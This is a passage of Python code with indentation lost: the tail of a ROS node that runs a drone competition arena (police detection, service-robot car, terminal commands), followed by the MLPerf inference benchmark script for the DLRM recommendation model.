if pioneer.info.name != POLICE:
position = pioneer.navigationManager.lps.position()
position_police = self.police.get_police_position()
if check_range(position, position_police, POLICE_DETECT_RANGE_FIRST, POLICE_DETECT_RANGE_FIRST, POLICE_DETECT_RANGE_HEIGHT):
if pioneer.info.status != StatusPioneer.BLOCK:
if KIBERPRO_TEAM.count(pioneer.info.name) == 0:
try:
pioneer.flasher.changeColor([[255, 130, 0]])
pioneer.flasher.setPower()
except:
pass
detect = PoliceDetect()
detect.name = pioneer.info.name
detect.position = position
detect.blocking = check_range(position, position_police, POLICE_DETECT_RANGE_SECOND, POLICE_DETECT_RANGE_SECOND, POLICE_DETECT_RANGE_HEIGHT) and not pioneer.inVertiport
self.__police_publisher.publish(detect)
else:
try:
if pioneer.flasher.checkRequestColors([[255, 130, 0]]) and pioneer.flasher.power:
pioneer.flasher.setPower(False)
except:
pass
def check_zombie(self): # TODO провекра на зомбт
for index in range(len(self.pioneers)):
position = self.__round_point(self.pioneers[index].naviagtionManager.lps.position())
time_now = rospy.Time.now().to_sec()
if position == self.pioneers_last_pos[index]:
if time_now - self.pioneers_last_pos_time[index] >= ZOMBIE_TIME:
self.change_status(index, StatusPioneer.ERROR)
else:
self.pioneers_last_pos[index] = position
self.pioneers_last_pos_time[index] = time_now
def land_all(self): # посадить всех
for index in range(len(self.pioneers)):
try:
self.change_status(index, StatusPioneer.BLOCK)
self.pioneers[index].flightController.landing()
except:
pass
def off_led_all(self): # выключить всем светодиоды
for index in range(len(self.pioneers)):
try:
self.pioneers[index].flasher.setPower(False)
except:
pass
try:
self.pioneers[index].ledController.changeAllColor(0, 0, 0)
except:
pass
def restart_all(self): # перезапуск всех пионеров
for index in range(len(self.pioneers)):
self.pioneers[index].boardManager.restart()
def print_result(self): # отправить результаты посещения вертипортов в лог
for pioneer in self.pioneers:
self.logger.sendPoliceMsg(f"Результат: {pioneer.info.name} - {pioneer.vertiport_ok.count(True)}/{len(pioneer.vertiport_ok)}")
class CarController(): # класс управления машинкой
def __init__(self, car_position_publisher = None, logger = None, generation_password_trigger = None):
self.position = Point()
self.run = False
self.full = None
self.logger = logger
self.__generation_password_trigger = generation_password_trigger
self.__pause_service = Service("car/pause", Trigger, self.handle_pause)
rospy.wait_for_service("car/run")
self.__run_proxy = ServiceProxy("car/run", SetBool)
self.__continue_proxy = ServiceProxy("car/continue", Empty)
self.__position_subscriber = Subscriber("car/position", Point, self.callback)
self.__car_position_publisher = car_position_publisher
def handle_pause(self, request): # обработчик запроса о паузе
if self.__car_position_publisher is not None:
self.run = False
self.logger.sendPolygonMsg("Серврис бот готов к загрузке")
self.__car_position_publisher.publish(self.position)
response = TriggerResponse()
if self.__generation_password_trigger is not None:
response.message = self.__generation_password_trigger()
return response
return TriggerResponse()
def callback(self, data): # обработчки позиции
self.position = data
def __release(self): # продолжиить движение через определенное время
rospy.sleep(30)
if not self.run:
self.logger.sendPolygonMsg("Сервис бот продолжает движение")
self.full = None
self.run_continue()
def set_run(self, command = True): # запуск машинки
self.run = command
self.__run_proxy(command)
def run_continue(self): # продолжение движения
self.run = True
self.__continue_proxy()
def set_full(self, name, message): # запрос на чтение
if message:
if not self.run:
if self.full is None:
self.logger.sendPolygonMsg("Сервис бот заблокирован")
Thread(target=self.__release).start()
self.full = name
return True
else:
if not self.run:
if self.full == name:
self.logger.sendPolygonMsg("Сервис бот выгружен и продолжает движение")
self.full = None
self.run_continue()
return True
return False
class TerminalActionServer(): # сервер терминала
def __init__(self, name):
self.command = TerminalCommand.RESET
self.msg = []
self.__server = SimpleActionServer(name, CommandAction, self.execute, False)
self.__server.start()
def reset(self): # очиска терминала
self.command = TerminalCommand.RESET
def send_msg(self, msg = ""): # добавить сообщения в отправку
self.msg.append(msg)
def execute(self, goal): # выполнение команды при получении
self.command = TerminalCommand(goal.command)
while ((self.command != TerminalCommand.RESET) or (len(self.msg) > 0)):
while len(self.msg) > 0:
self.__server.publish_feedback(CommandFeedback(self.msg[0]))
rospy.sleep(0.05)
self.msg.pop(0)
self.__server.set_succeeded(CommandResult(True))
class PolygonNode():
def __init__(self, rate = None, logger = None):
rospy.loginfo("Init polygon...")
self.rate = rate
self.status = StatusPolygon.INIT
self.run = True
self.check = False
self.start = False
self.__crash_one = False
self.__stop_one = False
self.car = None
self.__police_state_service = Service("polygon/police/get_state", PoliceState, self.handle_police_state)
self.__vertiport_request_service = Service("polygon/vertiport/request", GoToVertiport, self.handle_vertiport_request)
self.__car_request_service = Service("polygon/car/request", GoToCar, self.handle_car_request)
self.__pioneer_request_service = Service("polygon/pioneers/request", GoToLand, handler=None)
self.__access_service = Service("polygon/access", Access, handler=None)
self.__vertiports_pioneer_publisher = Publisher("polygon/vertiports/detect", StringArray2D, queue_size=10)
self.__pioneer_status_publisher = Publisher("polygon/pioneers/status", PioneerStatusArray, queue_size=10)
self.__police_detect_publisher = Publisher("polygon/police/detect", PoliceDetect, queue_size=10)
self.__polygon_status_publisher = Publisher("polygon/status", Int8, queue_size=10)
self.__car_position_publisher = Publisher("polygon/car/position", Point, queue_size=10)
self.__car_status_publisher = Publisher("polygon/car/status", Bool, queue_size=10)
self.__polygon_status_publisher.publish(self.status)
self.logger = logger
self.vertiports = VertiportsController(POLYGON_OBJECTS)
self.swarm = PioneerController(self.__pioneer_status_publisher, self.__pioneer_request_service, self.__police_detect_publisher, self.logger)
self.scene = Scenario(self.swarm, self.logger, self.vertiports, self.__access_service)
if CAR:
self.car = CarController(self.__car_position_publisher, self.logger, self.generate_password_trigger)
rospy.loginfo("Init polygon - done")
self.terminal = TerminalActionServer("/terminal/command")
def handle_police_state(self, request):
return PoliceStateResponse(self.swarm.police.get_police_position())
def handle_vertiport_request(self, request):
is_full = self.vertiports.set_full(request.index, request.name, request.message)
self.swarm.pioneers[self.swarm.get_pioneer_index_by_name(request.name)].inVertiport = request.message and is_full
return GoToVertiportResponse(is_full)
def handle_car_request(self, request):
return GoToCarResponse(self.car.set_full(request.name, request.message))
def __change_status(self, new_status):
self.status = new_status
self.__polygon_status_publisher.publish(self.status.value)
def generate_password_trigger(self):
if GENERATE_PASSWORD:
new_password = generate_password_string(PASSWORD_LENGTH)
self.scene.password = new_password
return new_password
else:
return DEFAULT_PASSWORD
def checkPioneerInVertiports(self):
detect = []
for vertiport in range(len(self.vertiports.position)):
detect_pioneer = []
for pioneer in self.swarm.pioneers:
if check_range(self.vertiports.position[vertiport], pioneer.navigationManager.lps.position(), VERTIPORT_RANGE, VERTIPORT_RANGE, 8):
detect_pioneer.append(pioneer.info.name)
pioneer.vertiport_ok[vertiport] = True
detect.append(StringArray(detect_pioneer))
self.vertiports.detect = StringArray2D(detect)
self.__vertiports_pioneer_publisher.publish(self.vertiports.detect)
def spin(self):
if self.terminal.command != TerminalCommand.RESET:
if self.terminal.command == TerminalCommand.CHECK:
self.__change_status(StatusPolygon.CHECK)
elif self.terminal.command == TerminalCommand.START:
self.__change_status(StatusPolygon.START)
elif self.terminal.command == TerminalCommand.STOP:
self.__change_status(StatusPolygon.STOP)
elif self.terminal.command == TerminalCommand.LAND:
self.swarm.land_all()
self.__change_status(StatusPolygon.NONE)
self.terminal.reset()
elif self.terminal.command == TerminalCommand.PRINT:
for pioneer in self.swarm.pioneers:
self.terminal.send_msg(pioneer.info.name)
self.terminal.reset()
elif self.terminal.command == TerminalCommand.BLOCK:
self.swarm.change_all_status(StatusPioneer.BLOCK)
self.terminal.reset()
elif self.terminal.command == TerminalCommand.UNBLOCK:
self.scene.number = 1
self.terminal.reset()
elif self.terminal.command == TerminalCommand.OFF:
self.swarm.off_led_all()
self.terminal.reset()
elif self.terminal.command == TerminalCommand.RESTART_BOARDS:
self.swarm.restart_all()
self.terminal.reset()
elif self.terminal.command == TerminalCommand.CHECK_MOTOR:
self.swarm.check_motor()
self.terminal.reset()
elif self.terminal.command == TerminalCommand.SHUTDOWN:
self.terminal.send_msg("Сервер выключается...")
self.__change_status(StatusPolygon.STOP)
self.run = False
if self.status == StatusPolygon.NONE:
self.__stop_one = False
self.check = False
self.__crash_one = False
elif self.status == StatusPolygon.CHECK:
if not self.check:
self.__crash_one = False
self.check = True
self.scene.reset()
self.logger.sendPolygonMsg("Идет проверка полигона")
self.terminal.send_msg("Идет проверка полигона...")
swarm_check_status, swarm_check_msg = self.swarm.check()
if not swarm_check_status:
for msg in swarm_check_msg:
self.terminal.send_msg(msg)
self.terminal.send_msg("Полигон сломан")
self.__change_status(StatusPolygon.CRASH)
else:
self.terminal.send_msg("Проверка полигона пройдена")
self.logger.sendPolygonMsg("Проверка полигона пройдена")
self.__change_status(StatusPolygon.NONE)
self.terminal.reset()
elif self.status == StatusPolygon.START:
if not self.start:
self.logger.sendPolygonMsg("Попытка начата")
self.scene.next()
self.terminal.send_msg("Старт попытки")
# self.swarm.check_zombie()
# self.swarm.check_colision()
if self.car is not None:
if not self.car.run:
self.car.set_run()
self.terminal.reset()
self.start = True
if not self.scene.run:
self.vertiports.all_zero()
self.swarm.change_all_status(StatusPioneer.ON)
self.swarm.check_police_detect()
self.checkPioneerInVertiports()
self.scene.spin()
if self.car is not None:
self.__car_status_publisher.publish(self.car.run)
elif self.status == StatusPolygon.STOP:
if self.start:
self.logger.sendPolygonMsg("Попытка завершена")
self.start = False
self.check = False
self.vertiports.set_pause()
self.swarm.land_all()
if self.car is not None:
self.car.set_run(False)
self.terminal.send_msg("Попытка остановлена")
self.__change_status(StatusPolygon.NONE)
self.terminal.reset()
else:
if not self.__stop_one:
self.terminal.send_msg("Попытка и так не начата")
self.terminal.reset()
self.__stop_one = True
elif self.status == StatusPolygon.CRASH:
if not self.__crash_one:
self.vertiports.set_pause()
self.__crash_one = True
self.start = False
self.check = False
if self.car is not None:
self.car.set_run(False)
if self.rate is not None:
self.rate.sleep()
return self.run
if __name__ == "__main__":
rospy.init_node("polygon_node")
rate = rospy.Rate(100)
logger = Logger()
polygon_node = PolygonNode(rate, logger)
while not rospy.is_shutdown() and polygon_node.spin():
pass
rospy.loginfo("Polygon is shutdown")
|
main.py | """
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import json
import logging
import os
import sys
import threading
import time
from multiprocessing import JoinableQueue
import mlperf_loadgen as lg
import numpy as np
import dataset
import criteo
# add dlrm code path
try:
dlrm_dir_path = os.environ['DLRM_DIR']
sys.path.append(dlrm_dir_path)
except KeyError:
print("ERROR: Please set DLRM_DIR environment variable to the dlrm code location")
sys.exit(0)
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"kaggle":
(criteo.Criteo, criteo.pre_process_criteo_dlrm, criteo.DlrmPostProcess(),
{"randomize": 'total', "memory_map": True}),
"terabyte":
(criteo.Criteo, criteo.pre_process_criteo_dlrm, criteo.DlrmPostProcess(),
{"randomize": 'total', "memory_map": True}),
}
# pre-defined command line options so simplify things. They are used as defaults and can be
# overwritten from command line
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "terabyte",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "pytorch-native",
"model": "dlrm",
"max-batchsize": 2048,
},
"dlrm-kaggle-pytorch": {
"dataset": "kaggle",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "pytorch-native",
"model": "dlrm",
"max-batchsize": 128,
},
"dlrm-terabyte-pytorch": {
"dataset": "terabyte",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "pytorch-native",
"model": "dlrm",
"max-batchsize": 2048,
},
"dlrm-kaggle-onnxruntime": {
"dataset": "kaggle",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "onnxruntime",
"model": "dlrm",
"max-batchsize": 128,
},
"dlrm-terabyte-onnxruntime": {
"dataset": "terabyte",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "onnxruntime",
"model": "dlrm",
"max-batchsize": 2048,
},
"tf_dlrm-kaggle-tensorflow": {
"dataset": "kaggle",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "tensorflow",
"model": "tf_dlrm",
"max-batchsize": 128,
},
"tf_dlrm-terabyte-tensorflow": {
"dataset": "terabyte",
"inputs": "continuous and categorical features",
"outputs": "probability",
"backend": "tensorflow",
"model": "tf_dlrm",
"max-batchsize": 2048,
},
}
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
"Offline": lg.TestScenario.Offline,
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--model", help="name of the mlperf model, ie. dlrm")
parser.add_argument("--model-path", required=True, help="path to the model file")
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, one of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--test-num-workers", type=int, default=0, help='# of workers reading the data')
parser.add_argument("--max-ind-range", type=int, default=-1)
parser.add_argument("--data-sub-sample-rate", type=float, default=0.0)
parser.add_argument("--mlperf-bin-loader", action='store_true', default=False)
parser.add_argument("--max-batchsize", type=int, help="max batch size in a single inference")
parser.add_argument("--output", help="test results")
parser.add_argument("--inputs", help="model inputs (currently not used)")
parser.add_argument("--outputs", help="model outputs (currently not used)")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--use-gpu", action="store_true", default=False)
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--cache", type=int, default=0, help="use cache (currently not used)")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true", help="enable finding peak performance pass")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="mlperf.conf", help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf", help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--duration", type=int, help="duration in milliseconds (ms)")
parser.add_argument("--target-qps", type=int, help="target/expected qps")
parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
parser.add_argument("--count-samples", type=int, help="dataset items to use")
parser.add_argument("--count-queries", type=int, help="number of queries to use")
parser.add_argument("--samples-per-query-multistream", type=int, help="query length for multi-stream scenario (in terms of aggregated samples)")
# --samples-per-query-offline is equivalent to perf_sample_count
parser.add_argument("--samples-per-query-offline", type=int, default=2048, help="query length for offline scenario (in terms of aggregated samples)")
parser.add_argument("--samples-to-aggregate-fix", type=int, help="number of samples to be treated as one")
parser.add_argument("--samples-to-aggregate-min", type=int, help="min number of samples to be treated as one in random query size")
parser.add_argument("--samples-to-aggregate-max", type=int, help="max number of samples to be treated as one in random query size")
parser.add_argument("--samples-to-aggregate-quantile-file", type=str, help="distribution quantile used to generate number of samples to be treated as one in random query size")
parser.add_argument("--samples-to-aggregate-trace-file", type=str, default="dlrm_trace_of_aggregated_samples.txt")
parser.add_argument("--numpy-rand-seed", type=int, default=123)
args = parser.parse_args()
# set random seed
np.random.seed(args.numpy_rand_seed)
# don't use defaults in argparser. Instead we default to a dict, override that with a profile
# and take this as default unless command line give
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.scenario not in SCENARIO_MAP:
parser.error("valid scanarios:" + str(list(SCENARIO_MAP.keys())))
return args
def get_backend(backend, dataset, max_ind_range, data_sub_sample_rate, use_gpu):
if backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
# NOTE: pass model parameters here, the following options are available
if dataset == "kaggle":
# 1. Criteo Kaggle Display Advertisement Challenge Dataset (see ./bench/dlrm_s_criteo_kaggle.sh)
backend = BackendPytorchNative(
m_spa=16,
ln_emb=np.array([1460,583,10131227,2202608,305,24,12517,633,3,93145,5683,8351593,3194,27,14992,5461306,10,5652,2173,4,7046547,18,15,286181,105,142572]),
ln_bot=np.array([13,512,256,64,16]),
ln_top=np.array([367,512,256,1]),
use_gpu=use_gpu
)
elif dataset == "terabyte":
if max_ind_range == 10000000:
# 2. Criteo Terabyte (see ./bench/dlrm_s_criteo_terabyte.sh [--sub-sample=0.875] --max-in-range=10000000)
backend = BackendPytorchNative(
m_spa=64,
ln_emb=np.array([9980333,36084,17217,7378,20134,3,7112,1442,61, 9758201,1333352,313829,10,2208,11156,122,4,970,14, 9994222, 7267859, 9946608,415421,12420,101, 36]),
ln_bot=np.array([13,512,256,64]),
ln_top=np.array([415,512,512,256,1]),
use_gpu=use_gpu
)
elif max_ind_range == 40000000:
# 3. Criteo Terabyte MLPerf training (see ./bench/run_and_time.sh --max-in-range=40000000)
backend = BackendPytorchNative(
m_spa=128,
ln_emb=np.array([39884406,39043,17289,7420,20263,3,7120,1543,63,38532951,2953546,403346,10,2208,11938,155,4,976,14,39979771,25641295,39664984,585935,12972,108,36]),
ln_bot=np.array([13,512,256,128]),
ln_top=np.array([479,1024,1024,512,256,1]),
use_gpu=use_gpu
)
else:
raise ValueError("only --max-ind-range 10M or 40M is supported")
else:
raise ValueError("only kaggle|terabyte dataset options are supported")
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
# NOTE: pass model parameters here, the following options are available
if dataset == "kaggle":
# 1. Criteo Kaggle Display Advertisement Challenge Dataset (see ./bench/dlrm_s_criteo_kaggle.sh)
backend = BackendOnnxruntime(
m_spa=16,
ln_emb=np.array([1460,583,10131227,2202608,305,24,12517,633,3,93145,5683,8351593,3194,27,14992,5461306,10,5652,2173,4,7046547,18,15,286181,105,142572]),
ln_bot=np.array([13,512,256,64,16]),
ln_top=np.array([367,512,256,1]),
use_gpu=use_gpu
)
elif dataset == "terabyte":
if max_ind_range == 10000000:
# 2. Criteo Terabyte (see ./bench/dlrm_s_criteo_terabyte.sh [--sub-sample=0.875] --max-in-range=10000000)
backend = BackendOnnxruntime(
m_spa=64,
ln_emb=np.array([9980333,36084,17217,7378,20134,3,7112,1442,61, 9758201,1333352,313829,10,2208,11156,122,4,970,14, 9994222, 7267859, 9946608,415421,12420,101, 36]),
ln_bot=np.array([13,512,256,64]),
ln_top=np.array([415,512,512,256,1]),
use_gpu=use_gpu
)
elif max_ind_range == 40000000:
# 3. Criteo Terabyte MLPerf training (see ./bench/run_and_time.sh --max-in-range=40000000)
backend = BackendOnnxruntime(
m_spa=128,
ln_emb=np.array([39884406,39043,17289,7420,20263,3,7120,1543,63,38532951,2953546,403346,10,2208,11938,155,4,976,14,39979771,25641295,39664984,585935,12972,108,36]),
ln_bot=np.array([13,512,256,128]),
ln_top=np.array([479,1024,1024,512,256,1]),
use_gpu=use_gpu
)
else:
raise ValueError("only --max-in-range 10M or 40M is supported")
else:
raise ValueError("only kaggle|terabyte dataset options are supported")
elif backend == "tensorflow":
from backend_tf import BackendTF
# NOTE: pass model parameters here, the following options are available
if dataset == "kaggle":
# 1. Criteo Kaggle Display Advertisement Challenge Dataset (see ./bench/dlrm_s_criteo_kaggle.sh)
backend = BackendTF(
dim_embed=16,
vocab_sizes=np.array([1460,583,10131227,2202608,305,24,12517,633,3,93145,5683,8351593,3194,27,14992,5461306,10,5652,2173,4,7046547,18,15,286181,105,142572]),
mlp_bottom=np.array([13,512,256,64,16]),
mlp_top=np.array([367,512,256,1]),
)
elif dataset == "terabyte":
if max_ind_range == 10000000:
# 2. Criteo Terabyte (see ./bench/dlrm_s_criteo_terabyte.sh [--sub-sample=0.875] --max-in-range=10000000)
backend = BackendTF(
dim_embed=64,
vocab_sizes=np.array([9980333,36084,17217,7378,20134,3,7112,1442,61, 9758201,1333352,313829,10,2208,11156,122,4,970,14, 9994222, 7267859, 9946608,415421,12420,101, 36]),
mlp_bottom=np.array([13,512,256,64]),
mlp_top=np.array([415,512,512,256,1]),
)
elif max_ind_range == 40000000:
# 3. Criteo Terabyte MLPerf training (see ./bench/run_and_time.sh --max-in-range=40000000)
backend = BackendTF(
dim_embed=128,
vocab_sizes=np.array([39884406,39043,17289,7420,20263,3,7120,1543,63,38532951,2953546,403346,10,2208,11938,155,4,976,14,39979771,25641295,39664984,585935,12972,108,36]),
mlp_bottom=np.array([13,512,256,128]),
mlp_top=np.array([479,1024,1024,512,256,1]),
)
else:
raise ValueError("only --max-in-range 10M or 40M is supported")
else:
raise ValueError("only kaggle|terabyte dataset options are supported")
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, batch_dense_X, batch_lS_o, batch_lS_i, batch_T=None, idx_offsets=None):
self.query_id = query_id
self.content_id = content_id
self.batch_dense_X = batch_dense_X
self.batch_lS_o = batch_lS_o
self.batch_lS_i = batch_lS_i
self.batch_T = batch_T
self.idx_offsets = idx_offsets
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
processed_results = []
try:
results = self.model.predict(qitem.batch_dense_X, qitem.batch_lS_o, qitem.batch_lS_i)
processed_results = self.post_process(results, qitem.batch_T, self.result_dict)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
except Exception as ex: # pylint: disable=broad-except
log.error("thread: failed, %s", ex)
# since post_process will not run, fake empty responses
processed_results = [[]] * len(qitem.query_id)
finally:
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
# NOTE: processed_results returned by DlrmPostProcess store both
# result = processed_results[idx][0] and target = processed_results[idx][1]
# also each idx might be a query of samples, rather than a single sample
# depending on the --samples-to-aggregate* arguments.
s_idx = qitem.idx_offsets[idx]
e_idx = qitem.idx_offsets[idx + 1]
# debug prints
# print("s,e:",s_idx,e_idx, len(processed_results))
response_array = array.array("B", np.array(processed_results[s_idx:e_idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
query_len = len(query_samples)
if query_len < self.max_batchsize:
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
else:
bs = self.max_batchsize
for i in range(0, query_len, bs):
ie = min(i + bs, query_len)
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx[i:ie])
self.run_one_item(Item(query_id[i:ie], idx[i:ie], batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
queue_size_multiplier = 4 #(args.samples_per_query_offline + max_batchsize - 1) // max_batchsize)
self.tasks = JoinableQueue(maxsize=threads * queue_size_multiplier)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
# None in the queue indicates the parent want us to exit
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
query_len = len(query_samples)
if query_len < self.max_batchsize:
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
else:
bs = self.max_batchsize
for i in range(0, query_len, bs):
ie = min(i + bs, query_len)
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "roc_auc" in result_dict:
result["roc_auc"] = 100. * result_dict["roc_auc"]
acc_str += ", auc={:.3f}%".format(result["roc_auc"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend, args.dataset, args.max_ind_range, args.data_sub_sample_rate, args.use_gpu)
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
# --count-samples can be used to limit the number of samples used for testing
ds = wanted_dataset(data_path=args.dataset_path,
name=args.dataset,
pre_process=pre_proc, # currently an identity function
use_cache=args.cache, # currently not used
count=args.count_samples,
samples_to_aggregate_fix=args.samples_to_aggregate_fix,
samples_to_aggregate_min=args.samples_to_aggregate_min,
samples_to_aggregate_max=args.samples_to_aggregate_max,
samples_to_aggregate_quantile_file=args.samples_to_aggregate_quantile_file,
samples_to_aggregate_trace_file=args.samples_to_aggregate_trace_file,
test_num_workers=args.test_num_workers,
max_ind_range=args.max_ind_range,
sub_sample_rate=args.data_sub_sample_rate,
mlperf_bin_loader=args.mlperf_bin_loader,
**kwargs)
# load model to backend
model = backend.load(args.model_path, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
mlperf_conf = os.path.abspath(args.mlperf_conf)
if not os.path.exists(mlperf_conf):
log.error("{} not found".format(mlperf_conf))
sys.exit(1)
user_conf = os.path.abspath(args.user_conf)
if not os.path.exists(user_conf):
log.error("{} not found".format(user_conf))
sys.exit(1)
if args.output:
output_dir = os.path.abspath(args.output)
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
ds.load_query_samples([0])
for _ in range(5):
batch_dense_X, batch_lS_o, batch_lS_i, _, _ = ds.get_samples([0])
_ = backend.predict(batch_dense_X, batch_lS_o, batch_lS_i)
ds.unload_query_samples(None)
scenario = SCENARIO_MAP[args.scenario]
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries():
pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
settings = lg.TestSettings()
settings.FromConfig(mlperf_conf, args.model_path, args.scenario)
settings.FromConfig(user_conf, args.model_path, args.scenario)
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.find_peak_performance:
settings.mode = lg.TestMode.FindPeakPerformance
if args.duration:
settings.min_duration_ms = args.duration
settings.max_duration_ms = args.duration
if args.target_qps:
settings.server_target_qps = float(args.target_qps)
settings.offline_expected_qps = float(args.target_qps)
if args.count_queries:
settings.min_query_count = args.count_queries
settings.max_query_count = args.count_queries
if args.samples_per_query_multistream:
settings.multi_stream_samples_per_query = args.samples_per_query_multistream
if args.max_latency:
settings.server_target_latency_ns = int(args.max_latency * NANO_SEC)
settings.multi_stream_target_latency_ns = int(args.max_latency * NANO_SEC)
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, args.samples_per_query_offline), ds.load_query_samples, ds.unload_query_samples)
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "roc_auc": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
lg.StartTest(sut, qsl, settings)
if not last_timeing:
last_timeing = runner.result_timing
if args.accuracy:
post_proc.finalize(result_dict, ds, output_dir=args.output)
add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
runner.finish()
